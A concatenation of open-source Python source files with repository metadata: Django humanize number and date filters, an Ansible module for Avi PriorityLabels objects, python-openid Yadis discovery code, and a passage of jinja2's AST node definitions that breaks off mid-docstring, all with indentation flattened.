except (TypeError, ValueError):
return value
suffixes = (_('th'), _('st'), _('nd'), _('rd'), _('th'), _('th'), _('th'), _('th'), _('th'), _('th'))
if value % 100 in (11, 12, 13): # special case
return mark_safe("%d%s" % (value, suffixes[0]))
# Mark value safe so i18n does not break with <sup> or <sub> see #19988
return mark_safe("%d%s" % (value, suffixes[value % 10]))
@register.filter(is_safe=True)
def intcomma(value, use_l10n=True):
"""
Converts an integer to a string containing commas every three digits.
For example, 3000 becomes '3,000' and 45000 becomes '45,000'.
"""
if settings.USE_L10N and use_l10n:
try:
if not isinstance(value, (float, Decimal)):
value = int(value)
except (TypeError, ValueError):
return intcomma(value, False)
else:
return number_format(value, force_grouping=True)
orig = force_text(value)
    new = re.sub(r"^(-?\d+)(\d{3})", r'\g<1>,\g<2>', orig)
if orig == new:
return new
else:
return intcomma(new, use_l10n)
# A tuple of standard large number to their converters
intword_converters = (
(6, lambda number: (
ungettext('%(value).1f million', '%(value).1f million', number),
ungettext('%(value)s million', '%(value)s million', number),
)),
(9, lambda number: (
ungettext('%(value).1f billion', '%(value).1f billion', number),
ungettext('%(value)s billion', '%(value)s billion', number),
)),
(12, lambda number: (
ungettext('%(value).1f trillion', '%(value).1f trillion', number),
ungettext('%(value)s trillion', '%(value)s trillion', number),
)),
(15, lambda number: (
ungettext('%(value).1f quadrillion', '%(value).1f quadrillion', number),
ungettext('%(value)s quadrillion', '%(value)s quadrillion', number),
)),
(18, lambda number: (
ungettext('%(value).1f quintillion', '%(value).1f quintillion', number),
ungettext('%(value)s quintillion', '%(value)s quintillion', number),
)),
(21, lambda number: (
ungettext('%(value).1f sextillion', '%(value).1f sextillion', number),
ungettext('%(value)s sextillion', '%(value)s sextillion', number),
)),
(24, lambda number: (
ungettext('%(value).1f septillion', '%(value).1f septillion', number),
ungettext('%(value)s septillion', '%(value)s septillion', number),
)),
(27, lambda number: (
ungettext('%(value).1f octillion', '%(value).1f octillion', number),
ungettext('%(value)s octillion', '%(value)s octillion', number),
)),
(30, lambda number: (
ungettext('%(value).1f nonillion', '%(value).1f nonillion', number),
ungettext('%(value)s nonillion', '%(value)s nonillion', number),
)),
(33, lambda number: (
ungettext('%(value).1f decillion', '%(value).1f decillion', number),
ungettext('%(value)s decillion', '%(value)s decillion', number),
)),
(100, lambda number: (
ungettext('%(value).1f googol', '%(value).1f googol', number),
ungettext('%(value)s googol', '%(value)s googol', number),
)),
)
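# Worked example (illustrative): for intword(1200000), the exponent-6 entry
# above applies (1200000 < 10**6 * 1000), the value is divided by 10**6 to
# give 1.2, and the '%(value).1f million' template renders '1.2 million'.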
@register.filter(is_safe=False)
def intword(value):
"""
Converts a large integer to a friendly text representation. Works best
for numbers over 1 million. For example, 1000000 becomes '1.0 million',
1200000 becomes '1.2 million' and '1200000000' becomes '1.2 billion'.
"""
try:
value = int(value)
except (TypeError, ValueError):
return value
if value < 1000000:
return value
def _check_for_i18n(value, float_formatted, string_formatted):
"""
Use the i18n enabled defaultfilters.floatformat if possible
"""
if settings.USE_L10N:
value = defaultfilters.floatformat(value, 1)
template = string_formatted
else:
template = float_formatted
return template % {'value': value}
for exponent, converters in intword_converters:
large_number = 10 ** exponent
if value < large_number * 1000:
new_value = value / float(large_number)
return _check_for_i18n(new_value, *converters(new_value))
return value
@register.filter(is_safe=True)
def apnumber(value):
"""
For numbers 1-9, returns the number spelled out. Otherwise, returns the
number. This follows Associated Press style.
"""
try:
value = int(value)
except (TypeError, ValueError):
return value
if not 0 < value < 10:
return value
return (_('one'), _('two'), _('three'), _('four'), _('five'),
_('six'), _('seven'), _('eight'), _('nine'))[value - 1]
# Perform the comparison in the default time zone when USE_TZ = True
# (unless a specific time zone has been applied with the |timezone filter).
@register.filter(expects_localtime=True)
def naturalday(value, arg=None):
"""
    For date values that are tomorrow, today or yesterday compared to
    the present day, return a representative string. Otherwise, return a
    string formatted according to settings.DATE_FORMAT.
"""
try:
tzinfo = getattr(value, 'tzinfo', None)
value = date(value.year, value.month, value.day)
except AttributeError:
# Passed value wasn't a date object
return value
except ValueError:
# Date arguments out of range
return value
today = datetime.now(tzinfo).date()
delta = value - today
if delta.days == 0:
return _('today')
elif delta.days == 1:
return _('tomorrow')
elif delta.days == -1:
return _('yesterday')
return defaultfilters.date(value, arg)
# This filter doesn't require expects_localtime=True because it deals properly
# with both naive and aware datetimes. Therefore avoid the cost of conversion.
@register.filter
def naturaltime(value):
"""
    For date and time values, show how many seconds, minutes or hours ago
    they occurred compared to the current timestamp, as a representative string.
"""
if not isinstance(value, date): # datetime is a subclass of date
return value
now = datetime.now(utc if is_aware(value) else None)
if value < now:
delta = now - value
if delta.days != 0:
return pgettext(
'naturaltime', '%(delta)s ago'
) % {'delta': defaultfilters.timesince(value, now)}
elif delta.seconds == 0:
return _('now')
elif delta.seconds < 60:
return ungettext(
# Translators: please keep a non-breaking space (U+00A0)
# between count and time unit.
'a second ago', '%(count)s seconds ago', delta.seconds
) % {'count': delta.seconds}
elif delta.seconds // 60 < 60:
count = delta.seconds // 60
return ungettext(
# Translators: please keep a non-breaking space (U+00A0)
# between count and time unit.
'a minute ago', '%(count)s minutes ago', count
) % {'count': count}
else:
count = delta.seconds // 60 // 60
return ungettext(
# Translators: please keep a non-breaking space (U+00A0)
# between count and time unit.
'an hour ago', '%(count)s hours ago', count
) % {'count': count}
else:
delta = value - now
if delta.days != 0:
return pgettext(
'naturaltime', '%(delta)s from now'
) % {'delta': defaultfilters.timeuntil(value, now)}
elif delta.seconds == 0:
return _('now')
elif delta.seconds < 60:
return ungettext(
# Translators: please keep a non-breaking space (U+00A0)
# between count and time unit.
'a second from now', '%(count)s seconds from now', delta.seconds
) % {'count': delta.seconds}
elif delta.seconds // 60 < 60:
count = delta.seconds // 60
return ungettext(
# Translators: please keep a non-breaking space (U+00A0)
# between count and time unit.
'a minute from now', '%(count)s minutes from now', count
) % {'count': count}
else:
count = delta.seconds // 60 // 60
return ungettext(
# Translators: please keep a non-breaking space (U+00A0)
# between count and time unit.
'an hour from now', '%(count)s hours from now', count
) % {'count': count}
|
bsd-3-clause
|
michael-dev2rights/ansible
|
lib/ansible/modules/network/avi/avi_prioritylabels.py
|
27
|
3614
|
#!/usr/bin/python
#
# Created on Aug 25, 2016
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
#
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_prioritylabels
author: Gaurav Rastogi (grastogi@avinetworks.com)
short_description: Module for setup of PriorityLabels Avi RESTful Object
description:
    - This module is used to configure the PriorityLabels object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.4"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent","present"]
cloud_ref:
description:
- It is a reference to an object of type cloud.
description:
description:
- A description of the priority labels.
equivalent_labels:
description:
- Equivalent priority labels in descending order.
name:
description:
- The name of the priority labels.
required: true
tenant_ref:
description:
- It is a reference to an object of type tenant.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Uuid of the priority labels.
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Example to create PriorityLabels object
avi_prioritylabels:
controller: 10.10.25.42
username: admin
password: something
state: present
name: sample_prioritylabels
"""
RETURN = '''
obj:
description: PriorityLabels (api/prioritylabels) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
cloud_ref=dict(type='str',),
description=dict(type='str',),
equivalent_labels=dict(type='list',),
name=dict(type='str', required=True),
tenant_ref=dict(type='str',),
url=dict(type='str',),
uuid=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'prioritylabels',
set([]))
if __name__ == '__main__':
main()
|
gpl-3.0
|
wd5/jangr
|
openid/yadis/discover.py
|
143
|
4445
|
# -*- test-case-name: openid.test.test_yadis_discover -*-
__all__ = ['discover', 'DiscoveryResult', 'DiscoveryFailure']
from cStringIO import StringIO
from openid import fetchers
from openid.yadis.constants import \
YADIS_HEADER_NAME, YADIS_CONTENT_TYPE, YADIS_ACCEPT_HEADER
from openid.yadis.parsehtml import MetaNotFound, findHTMLMeta
class DiscoveryFailure(Exception):
"""Raised when a YADIS protocol error occurs in the discovery process"""
identity_url = None
def __init__(self, message, http_response):
Exception.__init__(self, message)
self.http_response = http_response
class DiscoveryResult(object):
"""Contains the result of performing Yadis discovery on a URI"""
# The URI that was passed to the fetcher
request_uri = None
# The result of following redirects from the request_uri
normalized_uri = None
# The URI from which the response text was returned (set to
# None if there was no XRDS document found)
xrds_uri = None
# The content-type returned with the response_text
content_type = None
# The document returned from the xrds_uri
response_text = None
def __init__(self, request_uri):
"""Initialize the state of the object
sets all attributes to None except the request_uri
"""
self.request_uri = request_uri
def usedYadisLocation(self):
"""Was the Yadis protocol's indirection used?"""
return self.normalized_uri != self.xrds_uri
def isXRDS(self):
"""Is the response text supposed to be an XRDS document?"""
return (self.usedYadisLocation() or
self.content_type == YADIS_CONTENT_TYPE)
def discover(uri):
"""Discover services for a given URI.
@param uri: The identity URI as a well-formed http or https
URI. The well-formedness and the protocol are not checked, but
the results of this function are undefined if those properties
do not hold.
@return: DiscoveryResult object
@raises Exception: Any exception that can be raised by fetching a URL with
the given fetcher.
@raises DiscoveryFailure: When the HTTP response does not have a 200 code.
"""
result = DiscoveryResult(uri)
resp = fetchers.fetch(uri, headers={'Accept': YADIS_ACCEPT_HEADER})
if resp.status not in (200, 206):
raise DiscoveryFailure(
'HTTP Response status from identity URL host is not 200. '
'Got status %r' % (resp.status,), resp)
# Note the URL after following redirects
result.normalized_uri = resp.final_url
# Attempt to find out where to go to discover the document
# or if we already have it
result.content_type = resp.headers.get('content-type')
result.xrds_uri = whereIsYadis(resp)
if result.xrds_uri and result.usedYadisLocation():
resp = fetchers.fetch(result.xrds_uri)
if resp.status not in (200, 206):
exc = DiscoveryFailure(
'HTTP Response status from Yadis host is not 200. '
'Got status %r' % (resp.status,), resp)
exc.identity_url = result.normalized_uri
raise exc
result.content_type = resp.headers.get('content-type')
result.response_text = resp.body
return result
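# Illustrative usage (hypothetical URL; XRDS parsing is left to the caller):
#
#   result = discover('http://example.com/identity')
#   if result.isXRDS():
#       xrds_body = result.response_text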
def whereIsYadis(resp):
"""Given a HTTPResponse, return the location of the Yadis document.
May be the URL just retrieved, another URL, or None, if I can't
find any.
[non-blocking]
@returns: str or None
"""
# Attempt to find out where to go to discover the document
# or if we already have it
content_type = resp.headers.get('content-type')
# According to the spec, the content-type header must be an exact
# match, or else we have to look for an indirection.
if (content_type and
content_type.split(';', 1)[0].lower() == YADIS_CONTENT_TYPE):
return resp.final_url
else:
# Try the header
yadis_loc = resp.headers.get(YADIS_HEADER_NAME.lower())
if not yadis_loc:
# Parse as HTML if the header is missing.
#
# XXX: do we want to do something with content-type, like
# have a whitelist or a blacklist (for detecting that it's
# HTML)?
try:
yadis_loc = findHTMLMeta(StringIO(resp.body))
except MetaNotFound:
pass
return yadis_loc
|
bsd-3-clause
|
antsant/namebench
|
nb_third_party/jinja2/nodes.py
|
207
|
27369
|
# -*- coding: utf-8 -*-
"""
jinja2.nodes
~~~~~~~~~~~~
This module implements additional nodes derived from the ast base node.
It also provides some node tree helper functions like `in_lineno` and
`get_nodes` used by the parser and translator in order to normalize
python and jinja nodes.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import operator
from itertools import chain, izip
from collections import deque
from jinja2.utils import Markup
_binop_to_func = {
'*': operator.mul,
'/': operator.truediv,
'//': operator.floordiv,
'**': operator.pow,
'%': operator.mod,
'+': operator.add,
'-': operator.sub
}
_uaop_to_func = {
'not': operator.not_,
'+': operator.pos,
'-': operator.neg
}
_cmpop_to_func = {
'eq': operator.eq,
'ne': operator.ne,
'gt': operator.gt,
'gteq': operator.ge,
'lt': operator.lt,
'lteq': operator.le,
'in': lambda a, b: a in b,
'notin': lambda a, b: a not in b
}
class Impossible(Exception):
"""Raised if the node could not perform a requested action."""
class NodeType(type):
"""A metaclass for nodes that handles the field and attribute
inheritance. fields and attributes from the parent class are
automatically forwarded to the child."""
def __new__(cls, name, bases, d):
for attr in 'fields', 'attributes':
storage = []
storage.extend(getattr(bases[0], attr, ()))
storage.extend(d.get(attr, ()))
assert len(bases) == 1, 'multiple inheritance not allowed'
assert len(storage) == len(set(storage)), 'layout conflict'
d[attr] = tuple(storage)
d.setdefault('abstract', False)
return type.__new__(cls, name, bases, d)
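# Illustrative effect of the metaclass (not executed here): with
# Node.attributes == ('lineno', 'environment') and BinExpr.fields ==
# ('left', 'right'), a subclass like
#
#   class Mul(BinExpr):
#       operator = '*'
#
# inherits both tuples without redeclaring them.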
class EvalContext(object):
"""Holds evaluation time information. Custom attributes can be attached
to it in extensions.
"""
def __init__(self, environment, template_name=None):
if callable(environment.autoescape):
self.autoescape = environment.autoescape(template_name)
else:
self.autoescape = environment.autoescape
self.volatile = False
def save(self):
return self.__dict__.copy()
def revert(self, old):
self.__dict__.clear()
self.__dict__.update(old)
def get_eval_context(node, ctx):
if ctx is None:
if node.environment is None:
raise RuntimeError('if no eval context is passed, the '
'node must have an attached '
'environment.')
return EvalContext(node.environment)
return ctx
class Node(object):
"""Baseclass for all Jinja2 nodes. There are a number of nodes available
    of different types. There are four major types:
- :class:`Stmt`: statements
- :class:`Expr`: expressions
- :class:`Helper`: helper nodes
- :class:`Template`: the outermost wrapper node
All nodes have fields and attributes. Fields may be other nodes, lists,
or arbitrary values. Fields are passed to the constructor as regular
positional arguments, attributes as keyword arguments. Each node has
two attributes: `lineno` (the line number of the node) and `environment`.
The `environment` attribute is set at the end of the parsing process for
all nodes automatically.
"""
__metaclass__ = NodeType
fields = ()
attributes = ('lineno', 'environment')
abstract = True
def __init__(self, *fields, **attributes):
if self.abstract:
            raise TypeError('abstract nodes are not instantiable')
if fields:
if len(fields) != len(self.fields):
if not self.fields:
raise TypeError('%r takes 0 arguments' %
self.__class__.__name__)
raise TypeError('%r takes 0 or %d argument%s' % (
self.__class__.__name__,
len(self.fields),
len(self.fields) != 1 and 's' or ''
))
for name, arg in izip(self.fields, fields):
setattr(self, name, arg)
for attr in self.attributes:
setattr(self, attr, attributes.pop(attr, None))
if attributes:
raise TypeError('unknown attribute %r' %
iter(attributes).next())
def iter_fields(self, exclude=None, only=None):
"""This method iterates over all fields that are defined and yields
        ``(key, value)`` tuples. By default all fields are returned, but
it's possible to limit that to some fields by providing the `only`
parameter or to exclude some using the `exclude` parameter. Both
should be sets or tuples of field names.
"""
for name in self.fields:
if (exclude is only is None) or \
(exclude is not None and name not in exclude) or \
(only is not None and name in only):
try:
yield name, getattr(self, name)
except AttributeError:
pass
def iter_child_nodes(self, exclude=None, only=None):
"""Iterates over all direct child nodes of the node. This iterates
        over all fields and yields the values if they are nodes. If the value
of a field is a list all the nodes in that list are returned.
"""
for field, item in self.iter_fields(exclude, only):
if isinstance(item, list):
for n in item:
if isinstance(n, Node):
yield n
elif isinstance(item, Node):
yield item
def find(self, node_type):
"""Find the first node of a given type. If no such node exists the
return value is `None`.
"""
for result in self.find_all(node_type):
return result
def find_all(self, node_type):
"""Find all the nodes of a given type. If the type is a tuple,
the check is performed for any of the tuple items.
"""
for child in self.iter_child_nodes():
if isinstance(child, node_type):
yield child
for result in child.find_all(node_type):
yield result
def set_ctx(self, ctx):
"""Reset the context of a node and all child nodes. Per default the
parser will all generate nodes that have a 'load' context as it's the
most common one. This method is used in the parser to set assignment
targets and other nodes to a store context.
"""
todo = deque([self])
while todo:
node = todo.popleft()
if 'ctx' in node.fields:
node.ctx = ctx
todo.extend(node.iter_child_nodes())
return self
def set_lineno(self, lineno, override=False):
"""Set the line numbers of the node and children."""
todo = deque([self])
while todo:
node = todo.popleft()
if 'lineno' in node.attributes:
if node.lineno is None or override:
node.lineno = lineno
todo.extend(node.iter_child_nodes())
return self
def set_environment(self, environment):
"""Set the environment for all nodes."""
todo = deque([self])
while todo:
node = todo.popleft()
node.environment = environment
todo.extend(node.iter_child_nodes())
return self
def __eq__(self, other):
return type(self) is type(other) and \
tuple(self.iter_fields()) == tuple(other.iter_fields())
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
', '.join('%s=%r' % (arg, getattr(self, arg, None)) for
arg in self.fields)
)
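# Minimal sketch (assuming `env` is a jinja2 Environment): nodes can be
# built and constant-folded by hand:
#
#   node = Add(Const(1), Const(2), lineno=1)
#   node.set_environment(env)
#   node.as_const()  # -> 3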
class Stmt(Node):
"""Base node for all statements."""
abstract = True
class Helper(Node):
"""Nodes that exist in a specific context only."""
abstract = True
class Template(Node):
"""Node that represents a template. This must be the outermost node that
is passed to the compiler.
"""
fields = ('body',)
class Output(Stmt):
"""A node that holds multiple expressions which are then printed out.
This is used both for the `print` statement and the regular template data.
"""
fields = ('nodes',)
class Extends(Stmt):
"""Represents an extends statement."""
fields = ('template',)
class For(Stmt):
"""The for loop. `target` is the target for the iteration (usually a
:class:`Name` or :class:`Tuple`), `iter` the iterable. `body` is a list
of nodes that are used as loop-body, and `else_` a list of nodes for the
`else` block. If no else node exists it has to be an empty list.
For filtered nodes an expression can be stored as `test`, otherwise `None`.
"""
fields = ('target', 'iter', 'body', 'else_', 'test', 'recursive')
class If(Stmt):
"""If `test` is true, `body` is rendered, else `else_`."""
fields = ('test', 'body', 'else_')
class Macro(Stmt):
"""A macro definition. `name` is the name of the macro, `args` a list of
arguments and `defaults` a list of defaults if there are any. `body` is
a list of nodes for the macro body.
"""
fields = ('name', 'args', 'defaults', 'body')
class CallBlock(Stmt):
"""Like a macro without a name but a call instead. `call` is called with
    the unnamed macro as the `caller` argument that this node holds.
"""
fields = ('call', 'args', 'defaults', 'body')
class FilterBlock(Stmt):
"""Node for filter sections."""
fields = ('body', 'filter')
class Block(Stmt):
"""A node that represents a block."""
fields = ('name', 'body', 'scoped')
class Include(Stmt):
"""A node that represents the include tag."""
fields = ('template', 'with_context', 'ignore_missing')
class Import(Stmt):
"""A node that represents the import tag."""
fields = ('template', 'target', 'with_context')
class FromImport(Stmt):
"""A node that represents the from import tag. It's important to not
pass unsafe names to the name attribute. The compiler translates the
attribute lookups directly into getattr calls and does *not* use the
subscript callback of the interface. As exported variables may not
start with double underscores (which the parser asserts) this is not a
problem for regular Jinja code, but if this node is used in an extension
extra care must be taken.
The list of names may contain tuples if aliases are wanted.
"""
fields = ('template', 'names', 'with_context')
class ExprStmt(Stmt):
"""A statement that evaluates an expression and discards the result."""
fields = ('node',)
class Assign(Stmt):
"""Assigns an expression to a target."""
fields = ('target', 'node')
class Expr(Node):
"""Baseclass for all expressions."""
abstract = True
def as_const(self, eval_ctx=None):
"""Return the value of the expression as constant or raise
:exc:`Impossible` if this was not possible.
An :class:`EvalContext` can be provided, if none is given
a default context is created which requires the nodes to have
an attached environment.
.. versionchanged:: 2.4
the `eval_ctx` parameter was added.
"""
raise Impossible()
def can_assign(self):
"""Check if it's possible to assign something to this node."""
return False
class BinExpr(Expr):
"""Baseclass for all binary expressions."""
fields = ('left', 'right')
operator = None
abstract = True
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
f = _binop_to_func[self.operator]
try:
return f(self.left.as_const(eval_ctx), self.right.as_const(eval_ctx))
except:
raise Impossible()
class UnaryExpr(Expr):
"""Baseclass for all unary expressions."""
fields = ('node',)
operator = None
abstract = True
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
f = _uaop_to_func[self.operator]
try:
return f(self.node.as_const(eval_ctx))
except:
raise Impossible()
class Name(Expr):
"""Looks up a name or stores a value in a name.
The `ctx` of the node can be one of the following values:
- `store`: store a value in the name
- `load`: load that name
- `param`: like `store` but if the name was defined as function parameter.
"""
fields = ('name', 'ctx')
def can_assign(self):
return self.name not in ('true', 'false', 'none',
'True', 'False', 'None')
class Literal(Expr):
"""Baseclass for literals."""
abstract = True
class Const(Literal):
"""All constant values. The parser will return this node for simple
constants such as ``42`` or ``"foo"`` but it can be used to store more
complex values such as lists too. Only constants with a safe
    representation (objects where ``eval(repr(x)) == x`` is true) can be used.
"""
fields = ('value',)
def as_const(self, eval_ctx=None):
return self.value
@classmethod
def from_untrusted(cls, value, lineno=None, environment=None):
"""Return a const object if the value is representable as
constant value in the generated code, otherwise it will raise
an `Impossible` exception.
"""
from compiler import has_safe_repr
if not has_safe_repr(value):
raise Impossible()
return cls(value, lineno=lineno, environment=environment)
class TemplateData(Literal):
"""A constant template string."""
fields = ('data',)
def as_const(self, eval_ctx=None):
if get_eval_context(self, eval_ctx).autoescape:
return Markup(self.data)
return self.data
class Tuple(Literal):
"""For loop unpacking and some other things like multiple arguments
for subscripts. Like for :class:`Name` `ctx` specifies if the tuple
is used for loading the names or storing.
"""
fields = ('items', 'ctx')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return tuple(x.as_const(eval_ctx) for x in self.items)
def can_assign(self):
for item in self.items:
if not item.can_assign():
return False
return True
class List(Literal):
"""Any list literal such as ``[1, 2, 3]``"""
fields = ('items',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return [x.as_const(eval_ctx) for x in self.items]
class Dict(Literal):
"""Any dict literal such as ``{1: 2, 3: 4}``. The items must be a list of
:class:`Pair` nodes.
"""
fields = ('items',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return dict(x.as_const(eval_ctx) for x in self.items)
class Pair(Helper):
"""A key, value pair for dicts."""
fields = ('key', 'value')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.key.as_const(eval_ctx), self.value.as_const(eval_ctx)
class Keyword(Helper):
"""A key, value pair for keyword arguments where key is a string."""
fields = ('key', 'value')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.key, self.value.as_const(eval_ctx)
class CondExpr(Expr):
"""A conditional expression (inline if expression). (``{{
foo if bar else baz }}``)
"""
fields = ('test', 'expr1', 'expr2')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if self.test.as_const(eval_ctx):
return self.expr1.as_const(eval_ctx)
# if we evaluate to an undefined object, we better do that at runtime
if self.expr2 is None:
raise Impossible()
return self.expr2.as_const(eval_ctx)
class Filter(Expr):
"""This node applies a filter on an expression. `name` is the name of
the filter, the rest of the fields are the same as for :class:`Call`.
If the `node` of a filter is `None` the contents of the last buffer are
filtered. Buffers are created by macros and filter blocks.
"""
fields = ('node', 'name', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile or self.node is None:
raise Impossible()
# we have to be careful here because we call filter_ below.
# if this variable would be called filter, 2to3 would wrap the
        # call in a list because it is assuming we are talking about the
# builtin filter function here which no longer returns a list in
# python 3. because of that, do not rename filter_ to filter!
filter_ = self.environment.filters.get(self.name)
if filter_ is None or getattr(filter_, 'contextfilter', False):
raise Impossible()
obj = self.node.as_const(eval_ctx)
args = [x.as_const(eval_ctx) for x in self.args]
if getattr(filter_, 'evalcontextfilter', False):
args.insert(0, eval_ctx)
elif getattr(filter_, 'environmentfilter', False):
args.insert(0, self.environment)
kwargs = dict(x.as_const(eval_ctx) for x in self.kwargs)
if self.dyn_args is not None:
try:
args.extend(self.dyn_args.as_const(eval_ctx))
except:
raise Impossible()
if self.dyn_kwargs is not None:
try:
kwargs.update(self.dyn_kwargs.as_const(eval_ctx))
except:
raise Impossible()
try:
return filter_(obj, *args, **kwargs)
except:
raise Impossible()
class Test(Expr):
"""Applies a test on an expression. `name` is the name of the test, the
rest of the fields are the same as for :class:`Call`.
"""
fields = ('node', 'name', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
class Call(Expr):
"""Calls an expression. `args` is a list of arguments, `kwargs` a list
of keyword arguments (list of :class:`Keyword` nodes), and `dyn_args`
    and `dyn_kwargs` have to be either `None` or a node that is used as
node for dynamic positional (``*args``) or keyword (``**kwargs``)
arguments.
"""
fields = ('node', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile:
raise Impossible()
obj = self.node.as_const(eval_ctx)
# don't evaluate context functions
args = [x.as_const(eval_ctx) for x in self.args]
if getattr(obj, 'contextfunction', False):
raise Impossible()
elif getattr(obj, 'evalcontextfunction', False):
args.insert(0, eval_ctx)
elif getattr(obj, 'environmentfunction', False):
args.insert(0, self.environment)
kwargs = dict(x.as_const(eval_ctx) for x in self.kwargs)
if self.dyn_args is not None:
try:
args.extend(self.dyn_args.as_const(eval_ctx))
except:
raise Impossible()
if self.dyn_kwargs is not None:
try:
kwargs.update(self.dyn_kwargs.as_const(eval_ctx))
except:
raise Impossible()
try:
return obj(*args, **kwargs)
except:
raise Impossible()
class Getitem(Expr):
"""Get an attribute or item from an expression and prefer the item."""
fields = ('node', 'arg', 'ctx')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if self.ctx != 'load':
raise Impossible()
try:
return self.environment.getitem(self.node.as_const(eval_ctx),
self.arg.as_const(eval_ctx))
except:
raise Impossible()
def can_assign(self):
return False
class Getattr(Expr):
"""Get an attribute or item from an expression that is a ascii-only
bytestring and prefer the attribute.
"""
fields = ('node', 'attr', 'ctx')
def as_const(self, eval_ctx=None):
if self.ctx != 'load':
raise Impossible()
try:
eval_ctx = get_eval_context(self, eval_ctx)
            return self.environment.getattr(self.node.as_const(eval_ctx), self.attr)
except:
raise Impossible()
def can_assign(self):
return False
class Slice(Expr):
"""Represents a slice object. This must only be used as argument for
:class:`Subscript`.
"""
fields = ('start', 'stop', 'step')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
def const(obj):
if obj is None:
return None
return obj.as_const(eval_ctx)
return slice(const(self.start), const(self.stop), const(self.step))
class Concat(Expr):
"""Concatenates the list of expressions provided after converting them to
unicode.
"""
fields = ('nodes',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return ''.join(unicode(x.as_const(eval_ctx)) for x in self.nodes)
class Compare(Expr):
"""Compares an expression with some other expressions. `ops` must be a
list of :class:`Operand`\s.
"""
fields = ('expr', 'ops')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
result = value = self.expr.as_const(eval_ctx)
try:
for op in self.ops:
new_value = op.expr.as_const(eval_ctx)
result = _cmpop_to_func[op.op](value, new_value)
value = new_value
except:
raise Impossible()
return result
class Operand(Helper):
"""Holds an operator and an expression."""
fields = ('op', 'expr')
if __debug__:
Operand.__doc__ += '\nThe following operators are available: ' + \
', '.join(sorted('``%s``' % x for x in set(_binop_to_func) |
set(_uaop_to_func) | set(_cmpop_to_func)))
class Mul(BinExpr):
"""Multiplies the left with the right node."""
operator = '*'
class Div(BinExpr):
"""Divides the left by the right node."""
operator = '/'
class FloorDiv(BinExpr):
"""Divides the left by the right node and truncates conver the
result into an integer by truncating.
"""
operator = '//'
class Add(BinExpr):
"""Add the left to the right node."""
operator = '+'
class Sub(BinExpr):
"""Substract the right from the left node."""
operator = '-'
class Mod(BinExpr):
"""Left modulo right."""
operator = '%'
class Pow(BinExpr):
"""Left to the power of right."""
operator = '**'
class And(BinExpr):
"""Short circuited AND."""
operator = 'and'
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.left.as_const(eval_ctx) and self.right.as_const(eval_ctx)
class Or(BinExpr):
"""Short circuited OR."""
operator = 'or'
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.left.as_const(eval_ctx) or self.right.as_const(eval_ctx)
class Not(UnaryExpr):
"""Negate the expression."""
operator = 'not'
class Neg(UnaryExpr):
"""Make the expression negative."""
operator = '-'
class Pos(UnaryExpr):
"""Make the expression positive (noop for most expressions)"""
operator = '+'
# Helpers for extensions
class EnvironmentAttribute(Expr):
"""Loads an attribute from the environment object. This is useful for
extensions that want to call a callback stored on the environment.
"""
fields = ('name',)
class ExtensionAttribute(Expr):
"""Returns the attribute of an extension bound to the environment.
The identifier is the identifier of the :class:`Extension`.
This node is usually constructed by calling the
:meth:`~jinja2.ext.Extension.attr` method on an extension.
"""
fields = ('identifier', 'name')
class ImportedName(Expr):
"""If created with an import name the import name is returned on node
access. For example ``ImportedName('cgi.escape')`` returns the `escape`
function from the cgi module on evaluation. Imports are optimized by the
compiler so there is no need to assign them to local variables.
"""
fields = ('importname',)
class InternalName(Expr):
"""An internal name in the compiler. You cannot create these nodes
yourself but the parser provides a
